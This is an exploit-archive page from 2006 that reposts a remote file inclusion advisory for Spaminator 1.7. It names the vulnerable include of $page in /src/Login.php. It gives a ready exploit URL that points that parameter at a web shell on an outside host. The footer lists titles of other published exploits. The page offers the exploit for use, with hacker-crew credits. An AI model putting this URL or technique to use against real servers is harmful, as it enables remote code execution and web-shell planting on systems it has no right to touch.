exploits , vulnerabilities , articles , Spaminator <= 1.7 (page) Remote File Include Vulnerability

2006-08-10

Spaminator <= 1.7 (page) Remote File Include Vulnerability

Rated as : High Risk

Spaminator 1.7. ($page) Remote File Include
CreW: ToXiC
BuG Found By Drago84

SourcE CodE:
http://freshmeat.net/redir/spaminator/16281/url_tgz/spaminator-1.7.tar.gz

Page Affect is:
/src/Login.php

Problem is
   include "$page.php";

Path :
Declare $page

ExpL:
http://www.site.com/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php?

Greatz:str0ke


securitydot.net - 2006-08-10

Exploits - newest 10 RSS | More

2007-06-15 57091 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34081 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42232 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29247 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19679 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16636 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19334 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16511 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33512 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17162 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit